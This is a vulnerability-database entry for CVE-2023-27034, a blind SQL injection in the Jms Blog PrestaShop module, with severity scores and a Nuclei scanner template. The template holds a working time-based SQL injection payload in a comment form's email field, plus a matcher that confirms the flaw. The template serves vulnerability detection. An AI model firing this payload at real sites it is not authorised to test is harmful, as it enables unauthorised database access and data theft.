nuclei / ProjectDiscovery / NUCLEI:CVE-2023-27034
History: Jul 24, 2023 - 10:10 p.m.

Blind SQL injection vulnerability in Jms Blog

2023-07-24 22:10:33
ProjectDiscovery
github.com
Tags: blind sql injection, jms blog, joommasters, presta shop, data leak, unauthorized access

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 10
Confidence: High

EPSS: 0.038
Percentile: 92.1%

The module Jms Blog (jmsblog) from Joommasters contains a blind SQL injection vulnerability. The module is for the PrestaShop e-commerce platform and is mainly provided with Joommasters PrestaShop themes.

id: CVE-2023-27034

info:
  name: Blind SQL injection vulnerability in Jms Blog
  author: MaStErChO
  severity: critical
  description: |
    The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
    - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
    - https://github.com/advisories/GHSA-7jr7-v6gv-m656
    - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
    - https://github.com/codeb0ss/CVE-2023-27034-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27034
    cwe-id: CWE-89
    epss-score: 0.01204
    epss-percentile: 0.85171
    cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 2
    vendor: joommasters
    product: jms_blog
    framework: prestashop
  tags: cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters

http:
  - raw:
      - |
        @timeout: 12s
        POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
        Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Host: {{Hostname}}
        Connection: Keep-alive

        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="comment"

        555
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="customer_name"


        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="email"

        0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id_comment_reply"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="submitComment"

        submitComment=
        ------------YWJkMTQzNDcw--
      - |
        GET /modules/jmsblog/config.xml HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'contains(body_2, "Jms Blog")'
        condition: and
# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950
